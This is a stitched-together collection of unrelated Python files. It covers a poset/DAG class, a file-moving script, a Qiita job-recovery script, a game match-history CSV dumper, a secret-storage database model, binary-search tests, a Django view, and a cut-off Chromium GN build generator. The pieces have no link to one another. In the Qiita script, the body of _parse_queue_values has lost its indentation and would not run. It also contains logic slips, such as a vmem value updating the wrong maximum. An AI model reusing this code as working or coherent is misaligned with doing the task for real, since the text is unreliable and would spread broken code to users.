    def __init__(self, i, j):
        super().__init__(
            f"The relation {i}<{j} cannot be added since there is a k s.t. {j}<k but {i} is not <k")
#def visit_forward(dag, node, stack, visited, ancestor_dict):
# #Update node's ancestors
# ancestor_dict[node].update(stack)
# if(node not in visited):
# visited.add(node)
# stack.append(node)
# for child in dag._children[node]:
# visit_forward(dag, child, stack, visited, ancestor_dict)
# stack.pop(node)
#
#def visit_backward(dag, node, stack, visited, descendant_dict):
# #Update node's ancestors
# descendant_dict[node].update(stack)
# if(node not in visited):
# visited.add(node)
# stack.append(node)
# for parent in dag._parnts[node]:
# visit_backward(dag, parent, stack, visited, descendant_dict)
# stack.pop(node)
#def get_updated_ancestry_relations(dag):
# """updates ancestors and descendants relations of all nodes in poset based on dag"""
# sorted_nodes = dag.topological_sort()
# #Run DFS forward
# ancestor_dict = defaultdict(set)
# visited = set()
# stack = []
# for node in sorted_nodes:
# visit_forward(dag, node, stack, visited, ancestor_dict)
# #Run DFS backward
# descendant_dict = defaultdict(set)
# visited = set()
# stack = []
# for node in reversed(sorted_nodes):
# visit_backward(dag, node, stack, visited, descendant_dict)
# return ancestor_dict,descendant_dict
class Poset:
    """A finite partially ordered set, backed by a DAG of its relations."""
    def __init__(self, nodes):
        """
        Invariant: the underlying DAG should remain a Hasse diagram,
        i.e. i->j implies there is no path i->k->...->j
        """
        self.underlying_dag = cd.DAG(nodes=nodes)
        # _ancestors[j] holds every i with i < j; _descendants is the mirror.
        self._ancestors = defaultdict(set)
        self._descendants = defaultdict(set)
        # Count of relations recorded through the _add/_remove helpers.
        self._num_relations = 0
    def copy(self):
        """Return a deep, independent copy of this poset."""
        p = Poset(self.underlying_dag.nodes)
        p.underlying_dag = self.underlying_dag.copy()
        p._ancestors = deepcopy(self._ancestors)
        p._descendants = deepcopy(self._descendants)
        p._num_relations = self._num_relations
        return p
    @classmethod
    def from_dag(cls, dag):
        """Build the poset induced by reachability in *dag*."""
        p = Poset(dag.nodes)
        d = dag.copy()
        # Peel sources off one at a time, recording i < j for every node j
        # downstream of the current source i.
        while d.nodes:
            for i in d.sources():
                for j in d.downstream(i):
                    p.add_covering_relation(i, j)
                d.remove_node(i, ignore_error = True)
        # Replace the underlying DAG with the full transitive closure.
        full_dag = p.get_dag_transitive_closure()
        p.underlying_dag = full_dag
        return p
    def __str__(self):
        return str(self.underlying_dag._arcs)
    def __hash__(self):
        # Hash on arcs and nodes so equal posets hash equally (see __eq__).
        return hash((frozenset(self.underlying_dag._arcs), frozenset(self.underlying_dag._nodes)))
    def less_than(self, i, j):
        """is i < j?"""
        return i in self._ancestors[j]
    def greater_than(self, i, j):
        """is i > j?"""
        return i in self._descendants[j]
    def incomparable(self, i, j):
        """True when neither i < j nor i > j holds."""
        return (not self.less_than(i, j)) and (not self.greater_than(i, j))
    def get_smaller(self, i):
        """Return a copy of the set of elements strictly below i."""
        return self._ancestors[i].copy()
    @property
    def num_relations(self):
        return self._num_relations
    @property
    def size(self):
        """Number of elements in the poset."""
        return len(self.underlying_dag.nodes)
    # def add_covering_relations(self, S):
    #     for e in S:
    #         self.underlying_dag.add_arc(e[0], e[1])
    def _add_covering_relation(self, i, j):
        """Record i<j without validating the Hasse invariant (see caller)."""
        self.underlying_dag.add_arc(i, j)
        self._descendants[i].add(j)
        self._ancestors[j].add(i)
        self._num_relations += 1
    #def add_legitimate_relation(self, i, j, mag):
    #    error = True
    #    while(error):
    #        try:
    #            self.underlying_dag.add_arc(i,j)
    #            error=False
    #        except cd.CycleError as e:
    #            cycle = e.cycle
    #            for ind in range(len(cycle) -1): #the cycle is in i to j
    #                x = cycle[ind]
    #                y = cycle[ind+1]
    #                #Check if not expressed:
    #                if(not x==i and not y==j and not x in mag._parents[y]):
    #                    self._flip_relation(x, y, mag)
    #    self._descendants[i].add(j)
    #    self._ancestors[j].add(i)
    #    self._num_relations += 1
    def _add_covered_relation(self, i, j):
        """Method assumes that descendants(i).intersection(ancestors(j)) = phi, and i->j"""
        self.underlying_dag.remove_arc(i,j)
        self._descendants[i].remove(j)
        self._ancestors[j].remove(i)
        #Update underlying dag
        self._num_relations -= 1
    def _flip_relation(self, i, j, mag):
        """Method assumes that parents(i) + i = parents(j)"""
        self.underlying_dag.remove_arc(i,j)
        self._descendants[i].remove(j)
        self._ancestors[j].remove(i)
        error = True
        while(error):
            try:
                self.underlying_dag.add_arc(j,i)
                error=False
            except cd.CycleError as e:
                cycle = e.cycle
                for ind in range(len(cycle) -1): #the cycle is in j to i
                    x = cycle[ind]
                    y = cycle[ind+1]
                    #Check if not expressed:
                    if(not x==j and not y==i and not x in mag._parents[y]):
                        self._flip_relation(x, y, mag)
        self._ancestors[i].add(j)
        self._descendants[j].add(i)
    def add_covering_relation(self, i, j):
        """add i<j. Only allowed if it adding this relation does not imply any other relations by transitivity."""
        if not self.underlying_dag._parents[i] <= self._ancestors[j]:
            raise IntransitiveParentError(i, j)
        if not self.underlying_dag._children[j] <= self._descendants[i]:
            raise IntransitiveChildrenError(i, j)
        self._add_covering_relation(i, j)
    def is_total_order(self):
        """True when every pair of distinct elements is comparable."""
        return all(
            [not self.incomparable(e[0], e[1]) for e in set(itr.combinations(self.underlying_dag.nodes, 2))])
    def get_incomparable_pairs(self):
        """Return all ordered pairs (i, j), i != j, with i and j incomparable."""
        combinations = {(i, j) for i, j in itr.combinations(self.underlying_dag.nodes, r=2) if self.incomparable(i, j)}
        # Bug fix: the original returned `combinations | set(map(reversed,
        # combinations))`, which stores one-shot `reversed` iterator objects
        # instead of tuples, so membership tests and deduplication were
        # broken. Build proper reversed tuples instead.
        return combinations | {(j, i) for i, j in combinations}
    def get_ordered_pairs(self):
        """Return every ordered pair (i, j) with i < j."""
        ordered_pairs = {(i, j) for i, j in itr.permutations(self.underlying_dag.nodes, r=2) if self.less_than(i, j)}
        return ordered_pairs
    # def get_covering_relations(self):
    #     covering_relations = []
    #     for e in self.underlying_dag.arcs:
    #         for i in self.underlying_dag.nodes:
    #             if i != e[0] and i != e[1]:
    #                 if not (self.less_than(e[0], i) and self.less_than(i, e[1])):
    #                     if not e in covering_relations:
    #                         covering_relations.append(e)
    #     return covering_relations
    def get_dag_transitive_closure(self):
        """Return a DAG with an arc i->j for every related pair i < j."""
        node_set = self.underlying_dag.nodes
        to_return = cd.DAG(nodes=node_set)
        for e in itr.combinations(node_set, 2):
            if self.less_than(e[0], e[1]):
                to_return.add_arc(e[0], e[1])
            elif self.less_than(e[1], e[0]):
                to_return.add_arc(e[1], e[0])
        return to_return
    def get_covering_posets(self):
        """Posets obtained by adding one legal covering relation to self."""
        covering_posets = []
        for i, j in self.get_incomparable_pairs():
            # The new relation must not imply any other relation transitively.
            parents_okay = self.underlying_dag._parents[i] <= self._ancestors[j]
            children_okay = self.underlying_dag._children[j] <= self._descendants[i]
            if parents_okay and children_okay:
                p = self.copy()
                p._add_covering_relation(i, j)
                covering_posets.append(p)
        return covering_posets
    def get_covered_posets(self):
        """Posets obtained by removing one removable relation from self."""
        covered_posets = []
        for i,j in self.get_ordered_pairs():
            # Only remove i<j when nothing sits strictly between i and j.
            if(len(self._descendants[i].intersection(self._ancestors[j]))==0):
                p = self.copy()
                p._add_covered_relation(i,j)
                covered_posets.append(p)
        return covered_posets
    def __eq__(self, other):
        """Posets are equal when they order the same nodes the same way."""
        if self.underlying_dag.nodes != other.underlying_dag.nodes:
            return False
        for e in itr.combinations(self.underlying_dag.nodes, 2):
            u = e[0]
            v = e[1]
            if self.less_than(u, v) and not other.less_than(u, v):
                return False
            if other.less_than(u, v) and not self.less_than(u, v):
                return False
            if self.greater_than(u, v) and not other.greater_than(u, v):
                return False
            if other.greater_than(u, v) and not self.greater_than(u, v):
                return False
        return True
if __name__ == '__main__':
    # Smoke test: build the poset induced by a small hand-written DAG.
    dag = cd.DAG(arcs={(0, 1), (1, 3), (3, 4), (2, 3), (0, 3), (0, 4)})
    p = Poset.from_dag(dag)
    # VERBOSE = False
    # empty_poset = Poset(4)
    #
    # visited_posets = {frozenset(empty_poset.underlying_dag._arcs)}
    # queue = [empty_poset]
    # while queue:
    #     current_poset = queue.pop(0)
    #     covering_posets = current_poset.get_covering_posets()
    #     for poset in covering_posets:
    #         arcs = frozenset(poset.underlying_dag._arcs)
    #         # if arcs == {(1, 0), (0, 2), (1, 2)}:
    #         #     print(current_poset.underlying_dag.arcs)
    #         if arcs not in visited_posets:
    #             queue.append(poset)
    #             visited_posets.add(arcs)
    #
    # v = list(sorted(visited_posets, key=lambda p: len(p)))
    # print(len(visited_posets))
    # p = Poset(cd.DAG(nodes=set(range(3)), arcs={(0, 2)}))
    # print([t.underlying_dag.arcs for t in p.get_covering_posets()])
    # p = Poset(cd.DAG(nodes=set(range(3)), arcs={(1, 0), (0, 2)}))
    # print([t.underlying_dag.arcs for t in p.get_covering_posets(verbose=True)])
|
import os
import shutil
import glob
# Dataset identifiers supplied via the environment; both are required to
# locate the <TYPE>/<UUID>/raw directory.
UUID = os.getenv('UUID')
TYPE = os.getenv('TYPE')
if not UUID or not TYPE:
    # Fail with a clear message instead of the original TypeError from
    # concatenating None into a path.
    raise SystemExit('Both UUID and TYPE environment variables must be set')
files = glob.glob(os.path.join(TYPE, UUID, 'raw', '*'))
processed_dir = os.path.join(TYPE, UUID, 'processed')
# Fix: os.mkdir crashed with FileExistsError on re-runs; makedirs with
# exist_ok=True is idempotent.
os.makedirs(processed_dir, exist_ok=True)
for file in files:
    processed_file_path = os.path.join(processed_dir, os.path.basename(file))
    shutil.move(file, processed_file_path)
    print('Moved', file, 'to processed')
|
#!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from subprocess import check_output
from qiita_db.sql_connection import TRN
from qiita_db.processing_job import ProcessingJob
import pandas as pd
from time import sleep
from datetime import timedelta
from math import ceil
QIITA_QUEUE_LOG = '/home/qiita/qiita-queues-logs-DONT-DELETE.log'
SLEEP_TIME = 6
CHANCES = 3
SQL = """SELECT processing_job_id
FROM qiita.processing_job
JOIN qiita.processing_job_status
USING (processing_job_status_id)
WHERE processing_job_status = %s"""
def _submit_jobs(jids_to_recover, recover_type):
    """Set each job back to 'in_construction' and resubmit it.

    After submitting everything, sleeps SLEEP_TIME seconds split into
    CHANCES chunks so the operator can still ctrl-c between naps.
    """
    # we are going to split the SLEEP_TIME by CHANCES so we can ctrl-c
    # ... just in case
    st = int(ceil(SLEEP_TIME/CHANCES))
    len_jids_to_recover = len(jids_to_recover)
    for i, j in enumerate(jids_to_recover):
        # Fix: progress used to print as "total/index" (e.g. "10/0");
        # report the conventional "current/total" instead.
        print('recovering %s: %d/%d' % (recover_type, i + 1,
                                        len_jids_to_recover))
        job = ProcessingJob(j)
        job._set_status('in_construction')
        job.submit()
    for i in range(CHANCES):
        print('You can ctrl-c now, iteration %d' % i)
        sleep(st)
def _retrieve_queue_jobs():
    """Return the set of qiita job ids currently visible via qstat."""
    qiita_jobs = [line.split()[0]
                  for line in check_output("qstat").decode('ascii').split("\n")
                  # just retriving 'qiita' and ignoring [] (ipython workers)
                  if 'qiita' in line and '[]' not in line and
                  # and private jobs
                  'private' not in line and
                  'STDIN' not in line]
    qiita_jids = []
    for qj in qiita_jobs:
        # to retrieve info about the jobs we need to use the fullname, so
        # appending .ucsd.edu
        args = ["qstat", "-f", "%s.ucsd.edu" % qj]
        # the name is the last string of the line and has .txt prepended
        qji = [line.split()[-1].split(".")[0]
               for line in check_output(args).decode('ascii').split("\n")
               if 'Job_Name' in line]
        qiita_jids.extend(qji)
    return set(qiita_jids)
def _get_jids_to_recover(recover_type):
    """Return job ids in DB status *recover_type* that are not in the queue."""
    with TRN:
        TRN.add(SQL, [recover_type])
        jids = set(TRN.execute_fetchflatten())
        # Jobs still visible in the scheduler queue do not need recovery.
        jids_to_recover = list(jids - _retrieve_queue_jobs())
        print('Total %s: %d' % (recover_type, len(jids_to_recover)))
        return jids_to_recover
def _parse_queue_values(d):
max_mem = 0
max_pmem = 0
max_vmem = 0
max_wt = timedelta(hours=0, minutes=0, seconds=0)
d = d.split(',')
for dd in d:
if dd.startswith('mem'):
v = int(dd[4:-2])
if v > max_mem:
max_mem = v
elif dd.startswith('pmem'):
v = int(dd[5:-2])
if v > max_pmem:
max_pmem = v
elif dd.startswith('vmem'):
v = int(dd[5:-2])
if v > max_mem:
max_mem = v
elif dd.startswith('walltime'):
v = map(int, dd[9:].split(':'))
v = timedelta(hours=v[0], minutes=v[1], seconds=v[2])
if v > max_wt:
max_wt = v
return max_mem, max_pmem, max_vmem, max_wt
def _qiita_queue_log_parse(jids_to_recover):
    """Collect exit codes and resource usage from the queue accounting log.

    Returns a list of (ProcessingJob, [record, ...]) tuples, one record per
    log line of that job, restricted to jobs in *jids_to_recover*.
    """
    df = pd.read_csv(QIITA_QUEUE_LOG, sep='\t',
                     index_col=None, header=None, dtype=str, names=[
                         'bjid', 'user', 'group', 'jid', 'session',
                         'resource-list', 'resource-used', 'queue', 'account',
                         'exit-code', 'node'])
    # remove the register and empty fields to avoid errors
    df = df[(df.bjid != '0') &
            (~df.bjid.isnull()) &
            (~df.user.isnull()) &
            (df.jid != 'register.txt')]
    # generate the qiita job id (the part of the scheduler name before '.')
    df['qjid'] = df.jid.apply(lambda x: x.split('.')[0])
    results = []
    for jid, ddf in df.groupby('qjid'):
        if jid in jids_to_recover:
            vals = []
            for _, r in ddf.iterrows():
                vals.append({
                    'exit-code': r['exit-code'],
                    'resource-list': _parse_queue_values(r['resource-list']),
                    'resource-used': _parse_queue_values(r['resource-used'])})
            results.append((ProcessingJob(jid), vals))
    return results
def _flush_queues(recover_type):
    """Resubmit stuck jobs of *recover_type* in dependency-safe order."""
    # README 1: in theory we should be able to submit all recover_type jobs
    # one after the other but in reality that's not possible. The issue
    # is that a job is going to stay as running/waiting until is completed.
    # Thus, we need to run complete_job first, wait for everything to finish,
    # then continue with validate, then release_validators, and
    # finally everything else. Note that is suggested to wait for the
    # full recovery type to finish before moving to the next one
    # README 2: we now have a logging file for all submitted jobs, so let's
    # start checking for those that failed for system crashes or cause the
    # workers were busy, error-codes: 1-2
    # first resubmit jobs whose every logged run exited with code 1
    jids_to_recover = _get_jids_to_recover(recover_type)
    review_jobs = _qiita_queue_log_parse(jids_to_recover)
    jids_review_jobs = [j.id for j, r in review_jobs
                        if {rr['exit-code'] for rr in r} == {'1'}]
    _submit_jobs(jids_review_jobs, recover_type + '/queue_log/1')
    # then those whose every logged run exited cleanly (code 0)
    jids_to_recover = _get_jids_to_recover(recover_type)
    review_jobs = _qiita_queue_log_parse(jids_to_recover)
    jids_review_jobs = [j.id for j, r in review_jobs
                        if {rr['exit-code'] for rr in r} == {'0'}]
    _submit_jobs(jids_review_jobs, recover_type + '/queue_log/0')
    # first start with completing jobs that are not running
    jids_to_recover = _get_jids_to_recover(recover_type)
    complete_job = [j for j in jids_to_recover
                    if ProcessingJob(j).command.name == 'complete_job']
    _submit_jobs(complete_job, recover_type + '/complete_job')
    # first start validators that are not running
    jids_to_recover = _get_jids_to_recover(recover_type)
    validate = [j for j in jids_to_recover
                if ProcessingJob(j).command.name == 'Validate']
    _submit_jobs(validate, recover_type + '/validate')
    # then the release validator
    jids_to_recover = _get_jids_to_recover(recover_type)
    release_validators = [
        j for j in jids_to_recover
        if ProcessingJob(j).command.name == 'release_validators']
    _submit_jobs(release_validators, recover_type + '/release_validators')
def qiita_recover_jobs():
    """Recover processing jobs stuck in 'queued' or 'running' status."""
    # general full processing pipeline, as an example a deblur job as it yields
    # two artifacts, each new line represents a new job, each indented block a
    # waiting job
    # -> deblur
    #    -> complete_job -> release_validator
    #       -> validate biom 1
    #          -> release_validator
    #             -> complete_job -> create artifact
    #       -> validate biom 2
    #          -> release_validator
    #             -> complete_job -> create artifact
    # Step 1: recover jobs that are in queue status
    recover_type = 'queued'
    _flush_queues(recover_type)
    # then we recover what's left
    jids_to_recover = _get_jids_to_recover(recover_type)
    _submit_jobs(jids_to_recover, recover_type)
    # Step 2: recover jobs that are running, note that there are several steps
    # to recover this group: 2.1. check if they have validators,
    # 2.2. if so, recover validators, 2. recover failed jobs
    with TRN:
        recover_type = 'running'
        _flush_queues(recover_type)
        jids_to_recover = _get_jids_to_recover(recover_type)
        # 3.1, and 3.2: checking which jobs have validators, and recover them
        jobs_with_validators = []
        for j in jids_to_recover:
            job = ProcessingJob(j)
            validators = list(job.validator_jobs)
            if not validators:
                jobs_with_validators.append(j)
                continue
            else:
                # adding validators to jobs_with_validators to ignore them
                # in the next block of code
                for vj in validators:
                    jobs_with_validators.append(vj.id)
            status = set([v.status for v in validators
                          if v.id not in _retrieve_queue_jobs()])
            # if there are no status, that means that the validators weren't
            # created and we should rerun from scratch (Step 4)
            if not bool(status):
                continue
            # if multiple status in the validators, it's a complex behavior
            # and needs a case by case solution
            if len(status) != 1:
                print("Job '%s' has too many validators status (%d), check "
                      "them by hand" % (j, len(status)))
                continue
            status = list(status)[0]
            if status == 'waiting':
                print("releasing job validators: %s" % j)
                try:
                    job.release_validators()
                except Exception:
                    print("ERROR, releasing %s validators" % j)
                sleep(SLEEP_TIME)
            elif status == 'running':
                _submit_jobs(validators, recover_type + ' validator, running')
            elif status == 'error':
                # in this case is the same process than before but we need
                # to split the set in_construction and submit in 2 steps,
                # however, we can still submit via _submit_jobs
                for v in validators:
                    vjob = ProcessingJob(v)
                    vjob._set_status('in_construction')
                _submit_jobs(validators, recover_type + ' validator, error')
            else:
                print("Check the status of this job %s : %s and validators"
                      "%s." % (j, status, validators))
        jids_to_recover = set(jids_to_recover) - set(jobs_with_validators)
        # Step 3: Finally, we recover all the leftover jobs
        for i, j in enumerate(jids_to_recover):
            job = ProcessingJob(j)
            status = job.status
            if status == 'waiting':
                print("releasing job validators: %s" % j)
                job.release_validators()
                sleep(SLEEP_TIME)
            elif 'running' == status:
                _submit_jobs([j], 'main_job, running')
if __name__ == '__main__':
    # Deliberately not runnable: this module documents the recovery recipe
    # and must be invoked piecewise by an operator.
    raise ValueError('This script should never be called directly but should '
                     'be used as a reference if we need to recover jobs, '
                     'see: qiita_recover_jobs')
|
#!/usr/bin/env/ python
import requests
import match_history
import sys
import csv
"""
Gets the summoner match history of a particular summoner in the
na region. If summoners outside of NA are desired, edit the
match_history and summoner_name py scripts that get called
in tandem. Basically, don't do that.
Returns: a list of matches that the summoner has played in
"""
# This takes the second argument that has been passed by
# calling the command on the terminal and gives it to
# the 'name' variable.
# The first element of sys.argv is the script's own name, so skip it.
name = sys.argv[1]
def get_data(name = name):
    """Fetch *name*'s match history and return it as a list of dicts.

    Each match dict is re-keyed so 'matchId' becomes '_id' (MongoDB-style
    primary key, placed first); every other key passes through unchanged.
    """
    matches = match_history.get_match_history(name = name)['matches']
    records = []
    for match in matches:
        record = {'_id': match['matchId']}
        record.update((k, v) for k, v in match.items() if k != 'matchId')
        records.append(record)
    return records
if __name__ == "__main__":
    # Dump the summoner's matches to matches.csv, one row per match.
    matches = get_data(name)
    # 'wb' keeps this script's Python 2 csv semantics.
    with open('matches.csv', 'wb') as f:
        fieldnames = matches[0].keys()
        writer = csv.DictWriter(f, fieldnames = fieldnames)
        writer.writeheader()
        # Bug fix: the original looped `writer.writerows(f)` — passing the
        # file object itself — so no match rows were ever written.
        writer.writerows(matches)
import logging
from mongoengine import *
from spaceone.core.locator import Locator
from spaceone.core.model.mongo_model import MongoModel
_LOGGER = logging.getLogger(__name__)
class SecretTag(EmbeddedDocument):
    """Single key/value tag embedded inside a Secret document."""
    key = StringField(max_length=255)
    value = StringField(max_length=255)
class Secret(MongoModel):
    """Secret document (e.g. credentials), unique by name within a domain."""
    secret_id = StringField(max_length=40, generate_id='secret', unique=True)
    name = StringField(max_length=255, unique_with='domain_id')
    secret_type = StringField(max_length=40, choices=('CREDENTIALS',))
    tags = ListField(EmbeddedDocumentField(SecretTag))
    schema = StringField(max_length=40, null=True, default=None)
    provider = StringField(max_length=40, null=True, default=None)
    encrypted = BooleanField(default=False)
    encrypt_options = DictField()
    service_account_id = StringField(max_length=40, null=True, default=None)
    project_id = StringField(max_length=40, null=True, default=None)
    domain_id = StringField(max_length=255)
    created_at = DateTimeField(auto_now_add=True)
    meta = {
        'updatable_fields': [
            'name',
            'tags',
            'encrypted',
            # Bug fix: this entry previously read 'encrypted_options', which
            # matches no declared field; the field is 'encrypt_options'.
            'encrypt_options',
            'project_id'
        ],
        'minimal_fields': [
            'secret_id',
            'name',
            'secret_type',
            'encrypted'
        ],
        'change_query_keys': {
            'user_projects': 'project_id'
        },
        'ordering': [
            'name'
        ],
        'indexes': [
            'secret_id',
            'secret_type',
            'schema',
            'provider',
            'encrypted',
            'service_account_id',
            'project_id',
            'domain_id',
            ('tags.key', 'tags.value')
        ]
    }
    @classmethod
    def query(cls, *args, **kwargs):
        """Query secrets, translating 'secret_group_id' filters on the fly."""
        change_filter = []
        for condition in kwargs.get('filter', []):
            key = condition.get('k') or condition.get('key')
            if key == 'secret_group_id':
                # Secrets don't store the group; resolve it via the map table.
                change_filter.append(cls._change_secret_group_id_filter(condition))
            else:
                change_filter.append(condition)
        kwargs['filter'] = change_filter
        return super().query(*args, **kwargs)
    @staticmethod
    def _change_secret_group_id_filter(condition):
        """Rewrite a secret_group_id condition into a secret_id 'in' filter."""
        value = condition.get('v') or condition.get('value')
        operator = condition.get('o') or condition.get('operator')
        map_query = {
            'filter': [{
                'k': 'secret_group_id',
                'v': value,
                'o': operator
            }]
        }
        locator = Locator()
        secret_group_map_model = locator.get_model('SecretGroupMap')
        map_vos, total_count = secret_group_map_model.query(**map_query)
        return {
            'k': 'secret_id',
            'v': list(map(lambda map_vo: map_vo.secret.secret_id, map_vos)),
            'o': 'in'
        }
|
from challenges.array_binary_search import __version__
from challenges.array_binary_search.array_binary_search import binary_search
def test_version():
    """The package version is pinned at 0.1.0."""
    assert __version__ == '0.1.0'
def test_number_contained_inside_list():
    """A value present in the sorted list yields its index."""
    assert binary_search([4, 8, 15, 16, 23, 42], 15) == 2
def test_number_not_contained_inside_list():
    """A value absent from the sorted list yields the sentinel -1."""
    assert binary_search([11, 22, 33, 44, 55, 66, 77], 88) == -1
|
from blog.models import Post
from django.shortcuts import get_object_or_404, render
from .models import Work
# Create your views here.
def single(request, slug):
    """Render a single Work page alongside the latest blog posts (404s on a
    missing slug)."""
    work = get_object_or_404(Work, slug=slug)
    return render(request, 'works/single.html', {
        'w': work.to_dict(),
        'news': Post.objects.order_by('-date_created').all(),
    })
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates build.ninja that will build GN."""
import contextlib
import errno
import optparse
import os
import platform
import re
import subprocess
import sys
import tempfile
import last_commit_position
# Directory of this script, the repository root above it, and the GN source
# tree within the repo.
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
REPO_ROOT = os.path.dirname(SCRIPT_DIR)
GN_ROOT = os.path.join(REPO_ROOT, 'tools', 'gn')
class Platform(object):
  """Represents a host/target platform."""

  # Ordered (sys.platform prefix -> canonical name) pairs. Order matters:
  # 'mingw' must be tested before 'win'.
  _PREFIX_TO_NAME = (
      ('linux', 'linux'),
      ('darwin', 'darwin'),
      ('mingw', 'mingw'),
      ('win', 'msvc'),
      ('aix', 'aix'),
      ('fuchsia', 'fuchsia'),
      ('freebsd', 'freebsd'),
  )

  def __init__(self, platform):
    # An explicitly requested platform wins; otherwise canonicalize
    # sys.platform via the prefix table.
    self._platform = platform
    if self._platform is not None:
      return
    self._platform = sys.platform
    for prefix, canonical in Platform._PREFIX_TO_NAME:
      if self._platform.startswith(prefix):
        self._platform = canonical
        break

  @staticmethod
  def known_platforms():
    return ['linux', 'darwin', 'msvc', 'aix', 'fuchsia']

  def platform(self):
    return self._platform

  def is_linux(self):
    return self._platform == 'linux'

  def is_mingw(self):
    return self._platform == 'mingw'

  def is_msvc(self):
    return self._platform == 'msvc'

  def is_windows(self):
    # Either flavor of Windows toolchain.
    return self._platform in ('mingw', 'msvc')

  def is_darwin(self):
    return self._platform == 'darwin'

  def is_aix(self):
    return self._platform == 'aix'

  def is_posix(self):
    return self._platform in ['linux', 'freebsd', 'darwin', 'aix']
def windows_target_build_arch():
  """Return the Windows target build architecture: 'x64' or 'x86'."""
  # vcvarsall.bat exports %Platform% when configuring a target architecture.
  env_arch = os.environ.get('Platform')
  if env_arch in ('x64', 'x86'):
    return env_arch
  # Otherwise fall back to the host machine's architecture.
  if platform.machine().lower() in ('x86_64', 'amd64'):
    return 'x64'
  return 'x86'
def main(argv):
    """Parse command-line options and generate out/build.ninja."""
    parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
    parser.add_option('-d', '--debug', action='store_true',
                      help='Do a debug build. Defaults to release build.')
    parser.add_option('--platform',
                      help='target platform (' +
                           '/'.join(Platform.known_platforms()) + ')',
                      choices=Platform.known_platforms())
    parser.add_option('--host',
                      help='host platform (' +
                           '/'.join(Platform.known_platforms()) + ')',
                      choices=Platform.known_platforms())
    parser.add_option('--use-lto', action='store_true',
                      help='Enable the use of LTO')
    parser.add_option('--use-icf', action='store_true',
                      help='Enable the use of Identical Code Folding')
    parser.add_option('--no-last-commit-position', action='store_true',
                      help='Do not generate last_commit_position.h.')
    parser.add_option('--out-path',
                      help='The path to generate the build files in.')
    parser.add_option('--no-strip', action='store_true',
                      help='Don\'t strip release build. Useful for profiling.')
    options, args = parser.parse_args(argv)
    if args:
        parser.error('Unrecognized command line arguments: %s.' % ', '.join(args))

    target = Platform(options.platform)
    # Host defaults to the target platform when not given explicitly.
    host = Platform(options.host) if options.host else target

    out_dir = options.out_path or os.path.join(REPO_ROOT, 'out')
    if not os.path.isdir(out_dir):
        os.makedirs(out_dir)

    if not options.no_last_commit_position:
        GenerateLastCommitPosition(
            host,
            os.path.join(out_dir, 'tools/gn/last_commit_position.h'),
            'TOOLS_GN_LAST_COMMIT_POSITION_H_')
    WriteGNNinja(os.path.join(out_dir, 'build.ninja'), target, host, options)
    return 0
def GenerateLastCommitPosition(host, header, header_guard):
    """Write *header* containing the current git commit position.

    The literal '$Format:%h$' is substituted by `git archive`; when it still
    starts with '$' we are in a regular checkout, so query git directly.
    """
    commit = '$Format:%h$'
    if commit.startswith('$'):
        commit = last_commit_position.FetchCommitPosition('.')
    last_commit_position.WriteHeader(header, header_guard, commit)
def WriteGenericNinja(path, static_libraries, executables,
                      cc, cxx, ar, ld, platform, host, options,
                      cflags=None, cflags_cc=None, arflags=None,
                      ldflags=None, libflags=None,
                      include_dirs=None, solibs=None):
    """Write a ninja build file for the given libraries and executables.

    Args:
      path: output path of the build.ninja file; a matching depfile
          (path + '.d') is written alongside it.
      static_libraries: {name: {'sources': [...], 'tool': ..., ...}} of
          static libraries to build.
      executables: like static_libraries, with an extra per-target 'libs'.
      cc, cxx, ar, ld: toolchain binaries emitted into the ninja header.
      platform: target Platform; selects the template and file extensions.
      host: host Platform (accepted for interface symmetry; unused here).
      options: parsed command-line options (only options.debug is read).
      cflags..solibs: optional flag/path lists merged into the build rules.
    """
    # Bug fix: these parameters previously used mutable list defaults ([]),
    # which Python evaluates once and shares across every call.  Use None
    # sentinels and materialize fresh lists instead.
    cflags = [] if cflags is None else cflags
    cflags_cc = [] if cflags_cc is None else cflags_cc
    arflags = [] if arflags is None else arflags
    ldflags = [] if ldflags is None else ldflags
    libflags = [] if libflags is None else libflags
    include_dirs = [] if include_dirs is None else include_dirs
    solibs = [] if solibs is None else solibs

    # Header: toolchain variables plus a self-regeneration rule so ninja can
    # re-run gen.py when its inputs change.
    ninja_header_lines = [
        'cc = ' + cc,
        'cxx = ' + cxx,
        'ar = ' + ar,
        'ld = ' + ld,
        '',
        'rule regen',
        ' command = %s ../../build/gen.py%s --out-path .' % (
            sys.executable, ' -d' if options.debug else ''),
        ' description = Regenerating ninja files',
        '',
        'build build.ninja: regen',
        ' generator = 1',
        ' depfile = build.ninja.d',
        '',
    ]

    # The platform-specific template supplies the compile/link rules.
    template_filename = os.path.join(SCRIPT_DIR, {
        'msvc': 'build_win.ninja.template',
        'darwin': 'build_mac.ninja.template',
        'linux': 'build_linux.ninja.template',
        'freebsd': 'build_linux.ninja.template',
        'aix': 'build_aix.ninja.template',
    }[platform.platform()])
    with open(template_filename) as f:
        ninja_template = f.read()

    if platform.is_windows():
        executable_ext = '.exe'
        library_ext = '.lib'
        object_ext = '.obj'
    else:
        executable_ext = ''
        library_ext = '.a'
        object_ext = '.o'

    def escape_path_ninja(rel_path):
        # Escape '$', ' ' and ':' per ninja lexical syntax.  (Renamed the
        # parameter: it used to shadow the outer 'path' argument.)
        return rel_path.replace('$ ', '$$ ').replace(' ', '$ ').replace(':', '$:')

    def src_to_obj(src):
        # foo/bar.cc -> foo/bar.o (or .obj on Windows), ninja-escaped.
        return escape_path_ninja('%s' % os.path.splitext(src)[0] + object_ext)

    def library_to_a(library):
        return '%s%s' % (library, library_ext)

    ninja_lines = []

    def build_source(src_file, settings):
        # Emit one compile edge plus its per-source flag bindings.
        ninja_lines.extend([
            'build %s: %s %s' % (src_to_obj(src_file),
                                 settings['tool'],
                                 escape_path_ninja(
                                     os.path.join(REPO_ROOT, src_file))),
            ' includes = %s' % ' '.join(
                ['-I' + escape_path_ninja(dirname) for dirname in
                 include_dirs + settings.get('include_dirs', [])]),
            ' cflags = %s' % ' '.join(cflags + settings.get('cflags', [])),
            ' cflags_cc = %s' %
            ' '.join(cflags_cc + settings.get('cflags_cc', [])),
        ])

    for library, settings in static_libraries.items():
        for src_file in settings['sources']:
            build_source(src_file, settings)
